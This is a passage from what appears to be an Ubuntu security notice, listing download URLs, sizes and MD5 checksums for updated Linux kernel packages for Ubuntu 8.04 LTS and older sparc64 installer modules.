http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   163276 481deef18ee50e039791747737619c3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
  Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
  Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
  Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
  Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
  Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
  Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   145458 3e087634d61556643c32e342214a0642
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
  Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    26794 50bb7020338de7d00265de0765578291
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32672 7135f346092b651dafed111b91aee44d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    47602 e55422dc48484675642c96bdbc673595
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2089276 69416120cd161789b598b2b93034db07
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
  Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163034 9cc84b270528d0fef36320974b415392
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   236710 755a3caeceece8650e46706804c6e072
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
